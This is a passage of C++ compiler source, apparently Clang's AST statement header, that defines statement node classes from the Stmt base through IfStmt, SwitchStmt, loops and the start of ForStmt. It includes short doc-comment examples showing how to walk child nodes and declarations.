/// Const iterator for iterating over Stmt * arrays that contain only Expr *
struct ConstExprIterator
: llvm::iterator_adaptor_base<ConstExprIterator, const Stmt *const *,
std::random_access_iterator_tag,
const Expr *const> {
ConstExprIterator() : iterator_adaptor_base(nullptr) {}
ConstExprIterator(const Stmt *const *I) : iterator_adaptor_base(I) {}
reference operator*() const {
assert((*I)->getStmtClass() >= firstExprConstant &&
(*I)->getStmtClass() <= lastExprConstant);
return *reinterpret_cast<const Expr *const *>(I);
}
};
private:
/// \brief Whether statistic collection is enabled.
static bool StatisticsEnabled;
protected:
/// \brief Construct an empty statement.
explicit Stmt(StmtClass SC, EmptyShell) : Stmt(SC) {}
public:
Stmt(StmtClass SC) {
static_assert(sizeof(*this) == sizeof(void *),
"changing bitfields changed sizeof(Stmt)");
static_assert(sizeof(*this) % alignof(void *) == 0,
"Insufficient alignment!");
StmtBits.sClass = SC;
if (StatisticsEnabled) Stmt::addStmtClass(SC);
}
StmtClass getStmtClass() const {
return static_cast<StmtClass>(StmtBits.sClass);
}
const char *getStmtClassName() const;
/// SourceLocation tokens are not useful in isolation - they are low level
/// value objects created/interpreted by SourceManager. We assume AST
/// clients will have a pointer to the respective SourceManager.
SourceRange getSourceRange() const LLVM_READONLY;
SourceLocation getLocStart() const LLVM_READONLY;
SourceLocation getLocEnd() const LLVM_READONLY;
// global temp stats (until we have a per-module visitor)
static void addStmtClass(const StmtClass s);
static void EnableStatistics();
static void PrintStats();
/// \brief Dumps the specified AST fragment and all subtrees to
/// \c llvm::errs().
void dump() const;
void dump(SourceManager &SM) const;
void dump(raw_ostream &OS, SourceManager &SM) const;
void dump(raw_ostream &OS) const;
/// dumpColor - same as dump(), but forces color highlighting.
void dumpColor() const;
/// dumpPretty/printPretty - These two methods do a "pretty print" of the AST
/// back to its original source language syntax.
void dumpPretty(const ASTContext &Context) const;
void printPretty(raw_ostream &OS, PrinterHelper *Helper,
const PrintingPolicy &Policy, unsigned Indentation = 0,
const ASTContext *Context = nullptr) const;
/// viewAST - Visualize an AST rooted at this Stmt* using GraphViz. Only
/// works on systems with GraphViz (Mac OS X) or dot+gv installed.
void viewAST() const;
/// Skip past any implicit AST nodes which might surround this
/// statement, such as ExprWithCleanups or ImplicitCastExpr nodes.
Stmt *IgnoreImplicit();
const Stmt *IgnoreImplicit() const {
return const_cast<Stmt *>(this)->IgnoreImplicit();
}
/// \brief Skip no-op (attributed, compound) container stmts and skip captured
/// stmt at the top, if \a IgnoreCaptured is true.
Stmt *IgnoreContainers(bool IgnoreCaptured = false);
const Stmt *IgnoreContainers(bool IgnoreCaptured = false) const {
return const_cast<Stmt *>(this)->IgnoreContainers(IgnoreCaptured);
}
const Stmt *stripLabelLikeStatements() const;
Stmt *stripLabelLikeStatements() {
return const_cast<Stmt*>(
const_cast<const Stmt*>(this)->stripLabelLikeStatements());
}
/// Child Iterators: All subclasses must implement 'children'
/// to permit easy iteration over the substatements/subexpressions of an
/// AST node. This permits easy iteration over all nodes in the AST.
using child_iterator = StmtIterator;
using const_child_iterator = ConstStmtIterator;
using child_range = llvm::iterator_range<child_iterator>;
using const_child_range = llvm::iterator_range<const_child_iterator>;
child_range children();
const_child_range children() const {
auto Children = const_cast<Stmt *>(this)->children();
return const_child_range(Children.begin(), Children.end());
}
child_iterator child_begin() { return children().begin(); }
child_iterator child_end() { return children().end(); }
const_child_iterator child_begin() const { return children().begin(); }
const_child_iterator child_end() const { return children().end(); }
/// \brief Produce a unique representation of the given statement.
///
/// \param ID once the profiling operation is complete, will contain
/// the unique representation of the given statement.
///
/// \param Context the AST context in which the statement resides
///
/// \param Canonical whether the profile should be based on the canonical
/// representation of this statement (e.g., where non-type template
/// parameters are identified by index/level rather than their
/// declaration pointers) or the exact representation of the statement as
/// written in the source.
void Profile(llvm::FoldingSetNodeID &ID, const ASTContext &Context,
bool Canonical) const;
/// \brief Calculate a unique representation for a statement that is
/// stable across compiler invocations.
///
/// \param ID profile information will be stored in ID.
///
/// \param Hash an ODRHash object which will be called where pointers would
/// have been used in the Profile function.
void ProcessODRHash(llvm::FoldingSetNodeID &ID, ODRHash& Hash) const;
};
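/// Example (a minimal sketch, not part of the Stmt interface): a recursive
/// visitor built on the children() range above. Child slots may be null
/// (e.g. a missing 'else' branch), so a null check is required.
///
/// \code
///   void walk(const clang::Stmt *S, unsigned Depth = 0) {
///     if (!S) return;
///     llvm::errs().indent(Depth * 2) << S->getStmtClassName() << "\n";
///     for (const clang::Stmt *Child : S->children())
///       walk(Child, Depth + 1);
///   }
/// \endcode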
/// DeclStmt - Adaptor class for mixing declarations with statements and
/// expressions. For example, CompoundStmt mixes statements, expressions
/// and declarations (variables, types). Another example is ForStmt, where
/// the first statement can be an expression or a declaration.
class DeclStmt : public Stmt {
DeclGroupRef DG;
SourceLocation StartLoc, EndLoc;
public:
DeclStmt(DeclGroupRef dg, SourceLocation startLoc, SourceLocation endLoc)
: Stmt(DeclStmtClass), DG(dg), StartLoc(startLoc), EndLoc(endLoc) {}
/// \brief Build an empty declaration statement.
explicit DeclStmt(EmptyShell Empty) : Stmt(DeclStmtClass, Empty) {}
/// isSingleDecl - This method returns true if this DeclStmt refers
/// to a single Decl.
bool isSingleDecl() const {
return DG.isSingleDecl();
}
const Decl *getSingleDecl() const { return DG.getSingleDecl(); }
Decl *getSingleDecl() { return DG.getSingleDecl(); }
const DeclGroupRef getDeclGroup() const { return DG; }
DeclGroupRef getDeclGroup() { return DG; }
void setDeclGroup(DeclGroupRef DGR) { DG = DGR; }
SourceLocation getStartLoc() const { return StartLoc; }
void setStartLoc(SourceLocation L) { StartLoc = L; }
SourceLocation getEndLoc() const { return EndLoc; }
void setEndLoc(SourceLocation L) { EndLoc = L; }
SourceLocation getLocStart() const LLVM_READONLY { return StartLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return EndLoc; }
static bool classof(const Stmt *T) {
return T->getStmtClass() == DeclStmtClass;
}
// Iterators over subexpressions.
child_range children() {
return child_range(child_iterator(DG.begin(), DG.end()),
child_iterator(DG.end(), DG.end()));
}
using decl_iterator = DeclGroupRef::iterator;
using const_decl_iterator = DeclGroupRef::const_iterator;
using decl_range = llvm::iterator_range<decl_iterator>;
using decl_const_range = llvm::iterator_range<const_decl_iterator>;
decl_range decls() { return decl_range(decl_begin(), decl_end()); }
decl_const_range decls() const {
return decl_const_range(decl_begin(), decl_end());
}
decl_iterator decl_begin() { return DG.begin(); }
decl_iterator decl_end() { return DG.end(); }
const_decl_iterator decl_begin() const { return DG.begin(); }
const_decl_iterator decl_end() const { return DG.end(); }
using reverse_decl_iterator = std::reverse_iterator<decl_iterator>;
reverse_decl_iterator decl_rbegin() {
return reverse_decl_iterator(decl_end());
}
reverse_decl_iterator decl_rend() {
return reverse_decl_iterator(decl_begin());
}
};
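/// Example (illustrative sketch): enumerating the VarDecls introduced by a
/// DeclStmt via the decls() range above; isSingleDecl() distinguishes
/// 'int x;' from 'int x, y;'.
///
/// \code
///   void collectVars(const clang::DeclStmt *DS,
///                    llvm::SmallVectorImpl<const clang::VarDecl *> &Out) {
///     for (const clang::Decl *D : DS->decls())
///       if (const auto *VD = llvm::dyn_cast<clang::VarDecl>(D))
///         Out.push_back(VD);
///   }
/// \endcode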
/// NullStmt - This is the null statement ";": C99 6.8.3p3.
///
class NullStmt : public Stmt {
SourceLocation SemiLoc;
/// \brief True if the null statement was preceded by an empty macro, e.g:
/// @code
/// #define CALL(x)
/// CALL(0);
/// @endcode
bool HasLeadingEmptyMacro = false;
public:
friend class ASTStmtReader;
friend class ASTStmtWriter;
NullStmt(SourceLocation L, bool hasLeadingEmptyMacro = false)
: Stmt(NullStmtClass), SemiLoc(L),
HasLeadingEmptyMacro(hasLeadingEmptyMacro) {}
/// \brief Build an empty null statement.
explicit NullStmt(EmptyShell Empty) : Stmt(NullStmtClass, Empty) {}
SourceLocation getSemiLoc() const { return SemiLoc; }
void setSemiLoc(SourceLocation L) { SemiLoc = L; }
bool hasLeadingEmptyMacro() const { return HasLeadingEmptyMacro; }
SourceLocation getLocStart() const LLVM_READONLY { return SemiLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return SemiLoc; }
static bool classof(const Stmt *T) {
return T->getStmtClass() == NullStmtClass;
}
child_range children() {
return child_range(child_iterator(), child_iterator());
}
};
/// CompoundStmt - This represents a group of statements like { stmt stmt }.
class CompoundStmt final : public Stmt,
private llvm::TrailingObjects<CompoundStmt, Stmt *> {
friend class ASTStmtReader;
friend TrailingObjects;
SourceLocation LBraceLoc, RBraceLoc;
CompoundStmt(ArrayRef<Stmt *> Stmts, SourceLocation LB, SourceLocation RB);
explicit CompoundStmt(EmptyShell Empty) : Stmt(CompoundStmtClass, Empty) {}
void setStmts(ArrayRef<Stmt *> Stmts);
public:
static CompoundStmt *Create(const ASTContext &C, ArrayRef<Stmt *> Stmts,
SourceLocation LB, SourceLocation RB);
// \brief Build an empty compound statement with a location.
explicit CompoundStmt(SourceLocation Loc)
: Stmt(CompoundStmtClass), LBraceLoc(Loc), RBraceLoc(Loc) {
CompoundStmtBits.NumStmts = 0;
}
// \brief Build an empty compound statement.
static CompoundStmt *CreateEmpty(const ASTContext &C, unsigned NumStmts);
bool body_empty() const { return CompoundStmtBits.NumStmts == 0; }
unsigned size() const { return CompoundStmtBits.NumStmts; }
using body_iterator = Stmt **;
using body_range = llvm::iterator_range<body_iterator>;
body_range body() { return body_range(body_begin(), body_end()); }
body_iterator body_begin() { return getTrailingObjects<Stmt *>(); }
body_iterator body_end() { return body_begin() + size(); }
Stmt *body_front() { return !body_empty() ? body_begin()[0] : nullptr; }
Stmt *body_back() {
return !body_empty() ? body_begin()[size() - 1] : nullptr;
}
void setLastStmt(Stmt *S) {
assert(!body_empty() && "setLastStmt");
body_begin()[size() - 1] = S;
}
using const_body_iterator = Stmt* const *;
using body_const_range = llvm::iterator_range<const_body_iterator>;
body_const_range body() const {
return body_const_range(body_begin(), body_end());
}
const_body_iterator body_begin() const {
return getTrailingObjects<Stmt *>();
}
const_body_iterator body_end() const { return body_begin() + size(); }
const Stmt *body_front() const {
return !body_empty() ? body_begin()[0] : nullptr;
}
const Stmt *body_back() const {
return !body_empty() ? body_begin()[size() - 1] : nullptr;
}
using reverse_body_iterator = std::reverse_iterator<body_iterator>;
reverse_body_iterator body_rbegin() {
return reverse_body_iterator(body_end());
}
reverse_body_iterator body_rend() {
return reverse_body_iterator(body_begin());
}
using const_reverse_body_iterator =
std::reverse_iterator<const_body_iterator>;
const_reverse_body_iterator body_rbegin() const {
return const_reverse_body_iterator(body_end());
}
const_reverse_body_iterator body_rend() const {
return const_reverse_body_iterator(body_begin());
}
SourceLocation getLocStart() const LLVM_READONLY { return LBraceLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return RBraceLoc; }
SourceLocation getLBracLoc() const { return LBraceLoc; }
SourceLocation getRBracLoc() const { return RBraceLoc; }
static bool classof(const Stmt *T) {
return T->getStmtClass() == CompoundStmtClass;
}
// Iterators
child_range children() { return child_range(body_begin(), body_end()); }
const_child_range children() const {
return const_child_range(body_begin(), body_end());
}
};
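/// Example (illustrative sketch): scanning the direct children of a compound
/// statement with the body() range above; nested blocks are not visited.
///
/// \code
///   unsigned countTopLevelReturns(const clang::CompoundStmt *CS) {
///     unsigned N = 0;
///     for (const clang::Stmt *S : CS->body())
///       if (llvm::isa<clang::ReturnStmt>(S))
///         ++N;
///     return N;
///   }
/// \endcode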
// SwitchCase is the base class for CaseStmt and DefaultStmt.
class SwitchCase : public Stmt {
protected:
// A pointer to the following CaseStmt or DefaultStmt class,
// used by SwitchStmt.
SwitchCase *NextSwitchCase = nullptr;
SourceLocation KeywordLoc;
SourceLocation ColonLoc;
SwitchCase(StmtClass SC, SourceLocation KWLoc, SourceLocation ColonLoc)
: Stmt(SC), KeywordLoc(KWLoc), ColonLoc(ColonLoc) {}
SwitchCase(StmtClass SC, EmptyShell) : Stmt(SC) {}
public:
const SwitchCase *getNextSwitchCase() const { return NextSwitchCase; }
SwitchCase *getNextSwitchCase() { return NextSwitchCase; }
void setNextSwitchCase(SwitchCase *SC) { NextSwitchCase = SC; }
SourceLocation getKeywordLoc() const { return KeywordLoc; }
void setKeywordLoc(SourceLocation L) { KeywordLoc = L; }
SourceLocation getColonLoc() const { return ColonLoc; }
void setColonLoc(SourceLocation L) { ColonLoc = L; }
Stmt *getSubStmt();
const Stmt *getSubStmt() const {
return const_cast<SwitchCase*>(this)->getSubStmt();
}
SourceLocation getLocStart() const LLVM_READONLY { return KeywordLoc; }
SourceLocation getLocEnd() const LLVM_READONLY;
static bool classof(const Stmt *T) {
return T->getStmtClass() == CaseStmtClass ||
T->getStmtClass() == DefaultStmtClass;
}
};
class CaseStmt : public SwitchCase {
SourceLocation EllipsisLoc;
enum { LHS, RHS, SUBSTMT, END_EXPR };
Stmt* SubExprs[END_EXPR]; // The expression for the RHS is Non-null for
// GNU "case 1 ... 4" extension
public:
CaseStmt(Expr *lhs, Expr *rhs, SourceLocation caseLoc,
SourceLocation ellipsisLoc, SourceLocation colonLoc)
: SwitchCase(CaseStmtClass, caseLoc, colonLoc) {
SubExprs[SUBSTMT] = nullptr;
SubExprs[LHS] = reinterpret_cast<Stmt*>(lhs);
SubExprs[RHS] = reinterpret_cast<Stmt*>(rhs);
EllipsisLoc = ellipsisLoc;
}
/// \brief Build an empty switch case statement.
explicit CaseStmt(EmptyShell Empty) : SwitchCase(CaseStmtClass, Empty) {}
SourceLocation getCaseLoc() const { return KeywordLoc; }
void setCaseLoc(SourceLocation L) { KeywordLoc = L; }
SourceLocation getEllipsisLoc() const { return EllipsisLoc; }
void setEllipsisLoc(SourceLocation L) { EllipsisLoc = L; }
SourceLocation getColonLoc() const { return ColonLoc; }
void setColonLoc(SourceLocation L) { ColonLoc = L; }
Expr *getLHS() { return reinterpret_cast<Expr*>(SubExprs[LHS]); }
Expr *getRHS() { return reinterpret_cast<Expr*>(SubExprs[RHS]); }
Stmt *getSubStmt() { return SubExprs[SUBSTMT]; }
const Expr *getLHS() const {
return reinterpret_cast<const Expr*>(SubExprs[LHS]);
}
const Expr *getRHS() const {
return reinterpret_cast<const Expr*>(SubExprs[RHS]);
}
const Stmt *getSubStmt() const { return SubExprs[SUBSTMT]; }
void setSubStmt(Stmt *S) { SubExprs[SUBSTMT] = S; }
void setLHS(Expr *Val) { SubExprs[LHS] = reinterpret_cast<Stmt*>(Val); }
void setRHS(Expr *Val) { SubExprs[RHS] = reinterpret_cast<Stmt*>(Val); }
SourceLocation getLocStart() const LLVM_READONLY { return KeywordLoc; }
SourceLocation getLocEnd() const LLVM_READONLY {
// Handle deeply nested case statements with iteration instead of recursion.
const CaseStmt *CS = this;
while (const CaseStmt *CS2 = dyn_cast<CaseStmt>(CS->getSubStmt()))
CS = CS2;
return CS->getSubStmt()->getLocEnd();
}
static bool classof(const Stmt *T) {
return T->getStmtClass() == CaseStmtClass;
}
// Iterators
child_range children() {
return child_range(&SubExprs[0], &SubExprs[END_EXPR]);
}
};
class DefaultStmt : public SwitchCase {
Stmt* SubStmt;
public:
DefaultStmt(SourceLocation DL, SourceLocation CL, Stmt *substmt) :
SwitchCase(DefaultStmtClass, DL, CL), SubStmt(substmt) {}
/// \brief Build an empty default statement.
explicit DefaultStmt(EmptyShell Empty)
: SwitchCase(DefaultStmtClass, Empty) {}
Stmt *getSubStmt() { return SubStmt; }
const Stmt *getSubStmt() const { return SubStmt; }
void setSubStmt(Stmt *S) { SubStmt = S; }
SourceLocation getDefaultLoc() const { return KeywordLoc; }
void setDefaultLoc(SourceLocation L) { KeywordLoc = L; }
SourceLocation getColonLoc() const { return ColonLoc; }
void setColonLoc(SourceLocation L) { ColonLoc = L; }
SourceLocation getLocStart() const LLVM_READONLY { return KeywordLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return SubStmt->getLocEnd();}
static bool classof(const Stmt *T) {
return T->getStmtClass() == DefaultStmtClass;
}
// Iterators
child_range children() { return child_range(&SubStmt, &SubStmt+1); }
};
inline SourceLocation SwitchCase::getLocEnd() const {
if (const CaseStmt *CS = dyn_cast<CaseStmt>(this))
return CS->getLocEnd();
return cast<DefaultStmt>(this)->getLocEnd();
}
/// LabelStmt - Represents a label, which has a substatement. For example:
/// foo: return;
class LabelStmt : public Stmt {
SourceLocation IdentLoc;
LabelDecl *TheDecl;
Stmt *SubStmt;
public:
LabelStmt(SourceLocation IL, LabelDecl *D, Stmt *substmt)
: Stmt(LabelStmtClass), IdentLoc(IL), TheDecl(D), SubStmt(substmt) {
static_assert(sizeof(LabelStmt) ==
2 * sizeof(SourceLocation) + 2 * sizeof(void *),
"LabelStmt too big");
}
// \brief Build an empty label statement.
explicit LabelStmt(EmptyShell Empty) : Stmt(LabelStmtClass, Empty) {}
SourceLocation getIdentLoc() const { return IdentLoc; }
LabelDecl *getDecl() const { return TheDecl; }
void setDecl(LabelDecl *D) { TheDecl = D; }
const char *getName() const;
Stmt *getSubStmt() { return SubStmt; }
const Stmt *getSubStmt() const { return SubStmt; }
void setIdentLoc(SourceLocation L) { IdentLoc = L; }
void setSubStmt(Stmt *SS) { SubStmt = SS; }
SourceLocation getLocStart() const LLVM_READONLY { return IdentLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return SubStmt->getLocEnd();}
child_range children() { return child_range(&SubStmt, &SubStmt+1); }
static bool classof(const Stmt *T) {
return T->getStmtClass() == LabelStmtClass;
}
};
/// \brief Represents an attribute applied to a statement.
///
/// Represents an attribute applied to a statement. For example:
/// [[omp::for(...)]] for (...) { ... }
class AttributedStmt final
: public Stmt,
private llvm::TrailingObjects<AttributedStmt, const Attr *> {
friend class ASTStmtReader;
friend TrailingObjects;
Stmt *SubStmt;
SourceLocation AttrLoc;
unsigned NumAttrs;
AttributedStmt(SourceLocation Loc, ArrayRef<const Attr*> Attrs, Stmt *SubStmt)
: Stmt(AttributedStmtClass), SubStmt(SubStmt), AttrLoc(Loc),
NumAttrs(Attrs.size()) {
std::copy(Attrs.begin(), Attrs.end(), getAttrArrayPtr());
}
explicit AttributedStmt(EmptyShell Empty, unsigned NumAttrs)
: Stmt(AttributedStmtClass, Empty), NumAttrs(NumAttrs) {
std::fill_n(getAttrArrayPtr(), NumAttrs, nullptr);
}
const Attr *const *getAttrArrayPtr() const {
return getTrailingObjects<const Attr *>();
}
const Attr **getAttrArrayPtr() { return getTrailingObjects<const Attr *>(); }
public:
static AttributedStmt *Create(const ASTContext &C, SourceLocation Loc,
ArrayRef<const Attr*> Attrs, Stmt *SubStmt);
// \brief Build an empty attributed statement.
static AttributedStmt *CreateEmpty(const ASTContext &C, unsigned NumAttrs);
SourceLocation getAttrLoc() const { return AttrLoc; }
ArrayRef<const Attr*> getAttrs() const {
return llvm::makeArrayRef(getAttrArrayPtr(), NumAttrs);
}
Stmt *getSubStmt() { return SubStmt; }
const Stmt *getSubStmt() const { return SubStmt; }
void setSubStmt( Stmt*stmt) { SubStmt = stmt; }
SourceLocation getLocStart() const LLVM_READONLY { return AttrLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return SubStmt->getLocEnd();}
child_range children() { return child_range(&SubStmt, &SubStmt + 1); }
static bool classof(const Stmt *T) {
return T->getStmtClass() == AttributedStmtClass;
}
};
/// IfStmt - This represents an if/then/else.
class IfStmt : public Stmt {
enum { INIT, VAR, COND, THEN, ELSE, END_EXPR };
Stmt* SubExprs[END_EXPR];
SourceLocation IfLoc;
SourceLocation ElseLoc;
public:
IfStmt(const ASTContext &C, SourceLocation IL,
bool IsConstexpr, Stmt *init, VarDecl *var, Expr *cond,
Stmt *then, SourceLocation EL = SourceLocation(),
Stmt *elsev = nullptr);
/// \brief Build an empty if/then/else statement
explicit IfStmt(EmptyShell Empty) : Stmt(IfStmtClass, Empty) {}
/// \brief Retrieve the variable declared in this "if" statement, if any.
///
/// In the following example, "x" is the condition variable.
/// \code
/// if (int x = foo()) {
/// printf("x is %d", x);
/// }
/// \endcode
VarDecl *getConditionVariable() const;
void setConditionVariable(const ASTContext &C, VarDecl *V);
/// If this IfStmt has a condition variable, return the faux DeclStmt
/// associated with the creation of that condition variable.
const DeclStmt *getConditionVariableDeclStmt() const {
return reinterpret_cast<DeclStmt*>(SubExprs[VAR]);
}
Stmt *getInit() { return SubExprs[INIT]; }
const Stmt *getInit() const { return SubExprs[INIT]; }
void setInit(Stmt *S) { SubExprs[INIT] = S; }
const Expr *getCond() const { return reinterpret_cast<Expr*>(SubExprs[COND]);}
void setCond(Expr *E) { SubExprs[COND] = reinterpret_cast<Stmt *>(E); }
const Stmt *getThen() const { return SubExprs[THEN]; }
void setThen(Stmt *S) { SubExprs[THEN] = S; }
const Stmt *getElse() const { return SubExprs[ELSE]; }
void setElse(Stmt *S) { SubExprs[ELSE] = S; }
Expr *getCond() { return reinterpret_cast<Expr*>(SubExprs[COND]); }
Stmt *getThen() { return SubExprs[THEN]; }
Stmt *getElse() { return SubExprs[ELSE]; }
SourceLocation getIfLoc() const { return IfLoc; }
void setIfLoc(SourceLocation L) { IfLoc = L; }
SourceLocation getElseLoc() const { return ElseLoc; }
void setElseLoc(SourceLocation L) { ElseLoc = L; }
bool isConstexpr() const { return IfStmtBits.IsConstexpr; }
void setConstexpr(bool C) { IfStmtBits.IsConstexpr = C; }
bool isObjCAvailabilityCheck() const;
SourceLocation getLocStart() const LLVM_READONLY { return IfLoc; }
SourceLocation getLocEnd() const LLVM_READONLY {
if (SubExprs[ELSE])
return SubExprs[ELSE]->getLocEnd();
else
return SubExprs[THEN]->getLocEnd();
}
// Iterators over subexpressions. The iterators will include iterating
// over the initialization expression referenced by the condition variable.
child_range children() {
return child_range(&SubExprs[0], &SubExprs[0]+END_EXPR);
}
static bool classof(const Stmt *T) {
return T->getStmtClass() == IfStmtClass;
}
};
/// SwitchStmt - This represents a 'switch' stmt.
class SwitchStmt : public Stmt {
SourceLocation SwitchLoc;
enum { INIT, VAR, COND, BODY, END_EXPR };
Stmt* SubExprs[END_EXPR];
// This points to a linked list of case and default statements and, if the
// SwitchStmt is a switch on an enum value, records whether all the enum
// values were covered by CaseStmts. The coverage information value is meant
// to be a hint for possible clients.
llvm::PointerIntPair<SwitchCase *, 1, bool> FirstCase;
public:
SwitchStmt(const ASTContext &C, Stmt *Init, VarDecl *Var, Expr *cond);
/// \brief Build a empty switch statement.
explicit SwitchStmt(EmptyShell Empty) : Stmt(SwitchStmtClass, Empty) {}
/// \brief Retrieve the variable declared in this "switch" statement, if any.
///
/// In the following example, "x" is the condition variable.
/// \code
/// switch (int x = foo()) {
/// case 0: break;
/// // ...
/// }
/// \endcode
VarDecl *getConditionVariable() const;
void setConditionVariable(const ASTContext &C, VarDecl *V);
/// If this SwitchStmt has a condition variable, return the faux DeclStmt
/// associated with the creation of that condition variable.
const DeclStmt *getConditionVariableDeclStmt() const {
return reinterpret_cast<DeclStmt*>(SubExprs[VAR]);
}
Stmt *getInit() { return SubExprs[INIT]; }
const Stmt *getInit() const { return SubExprs[INIT]; }
void setInit(Stmt *S) { SubExprs[INIT] = S; }
const Expr *getCond() const { return reinterpret_cast<Expr*>(SubExprs[COND]);}
const Stmt *getBody() const { return SubExprs[BODY]; }
const SwitchCase *getSwitchCaseList() const { return FirstCase.getPointer(); }
Expr *getCond() { return reinterpret_cast<Expr*>(SubExprs[COND]);}
void setCond(Expr *E) { SubExprs[COND] = reinterpret_cast<Stmt *>(E); }
Stmt *getBody() { return SubExprs[BODY]; }
void setBody(Stmt *S) { SubExprs[BODY] = S; }
SwitchCase *getSwitchCaseList() { return FirstCase.getPointer(); }
/// \brief Set the case list for this switch statement.
void setSwitchCaseList(SwitchCase *SC) { FirstCase.setPointer(SC); }
SourceLocation getSwitchLoc() const { return SwitchLoc; }
void setSwitchLoc(SourceLocation L) { SwitchLoc = L; }
void setBody(Stmt *S, SourceLocation SL) {
SubExprs[BODY] = S;
SwitchLoc = SL;
}
void addSwitchCase(SwitchCase *SC) {
assert(!SC->getNextSwitchCase()
&& "case/default already added to a switch");
SC->setNextSwitchCase(FirstCase.getPointer());
FirstCase.setPointer(SC);
}
/// Set a flag in the SwitchStmt indicating that if the 'switch (X)' is a
/// switch over an enum value then all cases have been explicitly covered.
void setAllEnumCasesCovered() { FirstCase.setInt(true); }
/// Returns true if the SwitchStmt is a switch of an enum value and all cases
/// have been explicitly covered.
bool isAllEnumCasesCovered() const { return FirstCase.getInt(); }
SourceLocation getLocStart() const LLVM_READONLY { return SwitchLoc; }
SourceLocation getLocEnd() const LLVM_READONLY {
return SubExprs[BODY] ? SubExprs[BODY]->getLocEnd() : SubExprs[COND]->getLocEnd();
}
// Iterators
child_range children() {
return child_range(&SubExprs[0], &SubExprs[0]+END_EXPR);
}
static bool classof(const Stmt *T) {
return T->getStmtClass() == SwitchStmtClass;
}
};
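/// Example (illustrative sketch): walking the case list maintained by
/// addSwitchCase(). Since addSwitchCase() prepends, the list is in reverse
/// source order.
///
/// \code
///   unsigned countCases(const clang::SwitchStmt *SS) {
///     unsigned N = 0;
///     for (const clang::SwitchCase *SC = SS->getSwitchCaseList(); SC;
///          SC = SC->getNextSwitchCase())
///       ++N;
///     return N;
///   }
/// \endcode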
/// WhileStmt - This represents a 'while' stmt.
class WhileStmt : public Stmt {
SourceLocation WhileLoc;
enum { VAR, COND, BODY, END_EXPR };
Stmt* SubExprs[END_EXPR];
public:
WhileStmt(const ASTContext &C, VarDecl *Var, Expr *cond, Stmt *body,
SourceLocation WL);
/// \brief Build an empty while statement.
explicit WhileStmt(EmptyShell Empty) : Stmt(WhileStmtClass, Empty) {}
/// \brief Retrieve the variable declared in this "while" statement, if any.
///
/// In the following example, "x" is the condition variable.
/// \code
/// while (int x = random()) {
/// // ...
/// }
/// \endcode
VarDecl *getConditionVariable() const;
void setConditionVariable(const ASTContext &C, VarDecl *V);
/// If this WhileStmt has a condition variable, return the faux DeclStmt
/// associated with the creation of that condition variable.
const DeclStmt *getConditionVariableDeclStmt() const {
return reinterpret_cast<DeclStmt*>(SubExprs[VAR]);
}
Expr *getCond() { return reinterpret_cast<Expr*>(SubExprs[COND]); }
const Expr *getCond() const { return reinterpret_cast<Expr*>(SubExprs[COND]);}
void setCond(Expr *E) { SubExprs[COND] = reinterpret_cast<Stmt*>(E); }
Stmt *getBody() { return SubExprs[BODY]; }
const Stmt *getBody() const { return SubExprs[BODY]; }
void setBody(Stmt *S) { SubExprs[BODY] = S; }
SourceLocation getWhileLoc() const { return WhileLoc; }
void setWhileLoc(SourceLocation L) { WhileLoc = L; }
SourceLocation getLocStart() const LLVM_READONLY { return WhileLoc; }
SourceLocation getLocEnd() const LLVM_READONLY {
return SubExprs[BODY]->getLocEnd();
}
static bool classof(const Stmt *T) {
return T->getStmtClass() == WhileStmtClass;
}
// Iterators
child_range children() {
return child_range(&SubExprs[0], &SubExprs[0]+END_EXPR);
}
};
/// DoStmt - This represents a 'do/while' stmt.
class DoStmt : public Stmt {
SourceLocation DoLoc;
enum { BODY, COND, END_EXPR };
Stmt* SubExprs[END_EXPR];
SourceLocation WhileLoc;
SourceLocation RParenLoc; // Location of final ')' in do stmt condition.
public:
DoStmt(Stmt *body, Expr *cond, SourceLocation DL, SourceLocation WL,
SourceLocation RP)
: Stmt(DoStmtClass), DoLoc(DL), WhileLoc(WL), RParenLoc(RP) {
SubExprs[COND] = reinterpret_cast<Stmt*>(cond);
SubExprs[BODY] = body;
}
/// \brief Build an empty do-while statement.
explicit DoStmt(EmptyShell Empty) : Stmt(DoStmtClass, Empty) {}
Expr *getCond() { return reinterpret_cast<Expr*>(SubExprs[COND]); }
const Expr *getCond() const { return reinterpret_cast<Expr*>(SubExprs[COND]);}
void setCond(Expr *E) { SubExprs[COND] = reinterpret_cast<Stmt*>(E); }
Stmt *getBody() { return SubExprs[BODY]; }
const Stmt *getBody() const { return SubExprs[BODY]; }
void setBody(Stmt *S) { SubExprs[BODY] = S; }
SourceLocation getDoLoc() const { return DoLoc; }
void setDoLoc(SourceLocation L) { DoLoc = L; }
SourceLocation getWhileLoc() const { return WhileLoc; }
void setWhileLoc(SourceLocation L) { WhileLoc = L; }
SourceLocation getRParenLoc() const { return RParenLoc; }
void setRParenLoc(SourceLocation L) { RParenLoc = L; }
SourceLocation getLocStart() const LLVM_READONLY { return DoLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return RParenLoc; }
static bool classof(const Stmt *T) {
return T->getStmtClass() == DoStmtClass;
}
// Iterators
child_range children() {
return child_range(&SubExprs[0], &SubExprs[0]+END_EXPR);
}
};
/// ForStmt - This represents a 'for (init;cond;inc)' stmt. Note that any of
/// the init/cond/inc parts of the ForStmt will be null if they were not
/// specified in the source.
class ForStmt : public Stmt {
SourceLocation ForLoc;
enum { INIT, CONDVAR, COND, INC, BODY, END_EXPR };
Stmt* SubExprs[END_EXPR]; // SubExprs[INIT] is an expression or declstmt.
SourceLocation LParenLoc, RParenLoc;
public:
ForStmt(const ASTContext &C, Stmt *Init, Expr *Cond, VarDecl *condVar,
Expr *Inc, Stmt *Body, SourceLocation FL, SourceLocation LP,
SourceLocation RP);
/// \brief Build an empty for statement.
explicit ForStmt(EmptyShell Empty) : Stmt(ForStmtClass, Empty) {}
Stmt *getInit() { return SubExprs[INIT]; }
/// \brief Retrieve the variable declared in this "for" statement, if any.
///
/// In the following example, "y" is the condition variable.
/// \code
/// for (int x = random(); int y = mangle(x); ++x) {
/// // ...
/// }
/// \endcode
VarDecl *getConditionVariable() const;
void setConditionVariable(const ASTContext &C, VarDecl *V);
/// If this ForStmt has a condition variable, return the faux DeclStmt
/// associated with the creation of that condition variable.
const DeclStmt *getConditionVariableDeclStmt() const {
return reinterpret_cast<DeclStmt*>(SubExprs[CONDVAR]);
}
